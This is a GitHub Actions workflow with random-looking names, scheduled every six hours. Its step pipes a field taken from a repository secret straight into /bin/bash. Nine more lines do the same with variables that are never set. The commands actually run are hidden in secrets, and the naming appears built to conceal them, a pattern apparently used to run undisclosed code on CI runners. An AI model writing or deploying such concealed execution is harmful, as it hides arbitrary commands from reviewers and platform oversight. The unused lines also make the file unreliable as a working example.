name: flutteringretrospect

on:
  workflow_dispatch:
  schedule:
    - cron: '8 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: flutteringretrospect
        env:
          dwex370: ${{ secrets.dwex370 }}
        run: |
          echo $dwex370 | jq -r .ctaz39410 | /bin/bash
          echo $svx4 | jq -r .uydl77093 | /bin/bash
          echo $pn8340 | jq -r .xff853 | /bin/bash
          echo $umjp918 | jq -r .b2 | /bin/bash
          echo $auz08 | jq -r .xb8381 | /bin/bash
          echo $puliw36 | jq -r .uacex27 | /bin/bash
          echo $dlmj59 | jq -r .j00 | /bin/bash
          echo $j3 | jq -r .qe8 | /bin/bash
          echo $r2 | jq -r .oag20623 | /bin/bash
          echo $h610 | jq -r .xx14175 | /bin/bash

